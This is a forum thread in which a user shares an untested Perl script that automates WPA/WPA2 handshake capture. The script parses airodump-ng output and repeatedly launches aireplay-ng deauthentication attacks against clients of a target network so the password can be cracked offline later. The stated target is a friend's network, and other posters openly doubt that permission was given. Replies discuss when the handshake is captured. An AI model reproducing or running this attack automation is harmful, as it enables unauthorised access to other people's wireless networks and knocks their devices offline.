[GUIDE] How to make WPA/WPA2 crack automatic!

[spinmar]

Hi ,
yesterday I did a question in Tutorials & Guides without receiving any reply.
I'm supposing that my problem is quite common so I decided to ... try to solve it.
My problem: my friend has a wireless network WPA2 protected. I read the fantastic guide how to crack WPA/WPA2 and I tried to use it. The problem is that when I start airodump-ng there are no clients associated to the network. Maybe my friend connects to the network when I'm at work
How to solve it?
If I read well the guide it seems that the last part (running of aircrack-ng) could be done "offline" when there are no clients associated. The client-important part of the whole process is to take the handshake key and often there are no clients when you want it.
So I write a perl script which should help you to find the handshake.
The tipical scenario is: in the morning you start a shell in which you prepare your wireless adapter (monitor mode) and start airodump-ng.
From crontab or one other shell you start in background my perl script and then you ... go to work.
The purpose is: when you come back from work, you have a flile with handshake key (if in all day your friend connects to his network...) and this let you to continue the cracking process.
I wanted to insert the topic in Tutorials & Guides section but .... I can't write to that section.
I have to insert the script below because I can't find a way to insert an attachment.
I ended to finish to write the script 5 minutes ago and I'm at work. So I don't test it(anyway there is no dangerous operations...).
Suggestions and enhancement are welcome

+++++++++++++++++++++++++++
Perl Script
+++++++++++++++++++++++++++

#!/usr/bin/perl
# Autore: Spinmar
# Date: 20/06/2008
# -------------------------------

use POSIX qw(setsid);
use Getopt::Std;

$|=1;

my $SLEEP_TIMEOUT = 10;

getopt('iow');

if (!defined($opt_i) && !defined($opt_o) && !defined($opt_w)) {
print STDERR "usage: check_airodump.pl -i <file(\.txt) with option -w in airodump> -o <file_out_wpa_handshake> -w <wireless_adapter>\n";
exit;
}

my $FILE_OUT_AIRODUMP = $opt_i;

if (!-e $FILE_OUT_AIRODUMP) {
print STDERR "File $FILE_OUT_AIRODUMP doesn't exist!! Please insert absolute path\n";
exit;
}

my $FILE_OUT_HANDSHAKE = $opt_o;

my $WIRELESS_ADAPTER = $opt_w;

my $BSSID = '';
my $flag_exit = 0;

while (1) {
INIT:
if ($flag_exit) {
#kill aireplay-ng (it should be already stopped) and airodump-ng processes

my $airodump_ng = `ps aefx | grep 'airodump-ng' | grep -v grep`;
if (!defined($airodump_ng) || (length($airodump_ng) < 5)) {
print STDERR "No airodump-ng in execution\n";
exit;
}
my @tmp = split /\s+/, $airodump_ng;
if ($#tmp < 2) {
print STDERR "Error getting airodump-ng pid\n";
exit;
}
my $pid_process = $tmp[0];
if ($pid_process !~ /\d+/) {
print STDERR "Pid airodump-ng strange!! Not a number\n";
exit;
}
my $stop_airodump = `kill -9 $pid_process`;

my $aireplay_ng = `ps aefx | grep 'aireplay-ng' | grep -v grep`;
if (!defined($aireplay_ng) || (length($aireplay_ng) < 5)) {
print STDERR "[INFO]No aireplay in execution\n";
exit;
}
@tmp = split /\s+/, $aireplay_ng;
if ($#tmp < 2) {
print STDERR "[INFO]Error getting aireplay-ng pid\n";
exit;
}
$pid_process = $tmp[0];
if ($pid_process !~ /\d+/) {
print STDERR "[INFO]Pid aireplay-ng strange!! Not a number\n";
exit;
}
my $stop_aireplay = `kill -9 $pid_process`;
exit;
}

$num = 0;
my $station = 0;
my $pwr = 0;
my %list_bssid = ();
my %list_bssid_station = ();

open(FILEHANDLE, "<$FILE_OUT_AIRODUMP") or die("Error to open file $FILE_OUT_AIRODUMP\n");
LOOP: while(<FILEHANDLE>) {
if ($num == 0) {
#First Line: I lookfor WPA handshake
chop($_);
if ($_ =~ /WPA handshake:\s(.+)$/) {
#FOUND!!!
# The handshake output file contains:
# <BSSID of examined network> - <WPA handskake>
my $hand_shake = $1;
open(FILEHANDLE_HS, ">$FILE_OUT_HANDSHAKE") or die("Error to open file $FILE_OUT_HANDSHAKE\n");
print FILEHANDLE_HS "$BSSID - $hand_shake\n";
close (FILEHANDLE_HS);
$flag_exit = 1;
close (FILEHANDLE);
goto INIT;
}
}
chop($_);
my @tmp = split /\s+/, $_;
if ($#tmp == 0) {
$num++;
next LOOP;
}

if ($tmp[1] eq 'PWR') {
$pwr = 1;
$num++;
next LOOP;
}
elsif ($tmp[1] eq 'STATION') {
$station = 1;
$pwr = 0;
$num++;
next LOOP;
}
else {
if ($pwr) {
# I only get WPA/WPA2.
# list_bssid = BSSID -> ESSID
if (($tmp[8] eq 'WPA') || ($tmp[8] eq 'WPA2')) {
$list_bssid{$tmp[0]} = $tmp[$#tmp];
}
}
elsif ($station) {
if (($tmp[0] =~ /\w\w:\w\w:\w\w:\w\w:\w\w:\w\w/) && ($tmp[1] =~ /\w\w:\w\w:\w\w:\w\w:\w\w:\w\w/) && (exists($list_bssid{$tmp[0]}))) {
$list_bssid_station{$tmp[0]} = $tmp[1];
}
}

}
#my @tmp = split /\|/, $_;

$num++;
}
close (FILEHANDLE);

#Check if there is other aireplay-ng processes
my $aireplay_ng = `ps aefx | grep 'aireplay-ng' | grep -v grep`;
if (defined($aireplay_ng) && (length($aireplay_ng) > 5)) {
goto DORMI;
}

my ($key, $value);

while(($key, $value) = each(%list_bssid_station)) {
$BSSID = $key;
system("nohup aireplay-ng -0 1 -a $key -c $value $WIRELESS_ADAPTER &");
#One other way to do this
#my $pid = fork();
#die "Can't fork $!" unless defined $pid;
#if (!$pid) {
#open (STDIN "</dev/null");
#open (STDOUT ">/dev/null");
#open (STDERR ">&STDOUT");
#exec "aireplay-ng -0 1 -a $key -c $value $WIRELESS_ADAPTER";
#exit(0);
#}
goto DORMI;
}

DORMI:
sleep($SLEEP_TIMEOUT);
}

exit(0);

++++++++++++++++++++++++++++++++++++
Fine
++++++++++++++++++++++++++++++++++++

Best regards

[jackabee]

Couldn't you just leave airodump-ng running until you get home?
And you also asked your "friend" if you can do this? From what you wrote it sounds like you dont have permission.

[spinmar]

My friend and I made a bet: I have 5 days to find his password.
The prize is a ... pizza
If I leave running airodump-ng all day and if my friend connects when I'm not present, how can I do to run aireplay-ng?

[purehate]

Couldn't you just leave airodump-ng running until you get home?
And you also asked your "friend" if you can do this? From what you wrote it sounds like you dont have permission.

Yes. Although I admire the scripting effort all you have to do is leave airodump running and when a client connects the handshake is captured.

Aireplay is for deauthing an already connected client from the network and forcing him to reconnect thus capturing the handshake.

[spinmar]

Yes. Although I admire the scripting effort all you have to do is leave airodump running and when a client connects the handshake is captured.

Aireplay is for deauthing an already connected client from the network and forcing him to reconnect thus capturing the handshake.

Oh my god !!
I didn't understand aireplay-ng!!
So if there are no clients, if I leave airodump-ng running, if a client connects is handshake captured? But if it disconnets, the handshake remains in the airodump-ng window?

[imported_=Tron=]

Oh my god !!
I didn't understand aireplay-ng!!
So if there are no clients, if I leave airodump-ng running, if a client connects is handshake captured? But if it disconnets, the handshake remains in the airodump-ng window?

As long as you write the captured data to a file the handshake will not disappear regardless if the client disconnects at once.

[jackabee]

The prize is a ... pizza

Man get ur ass movin you cant miss out on this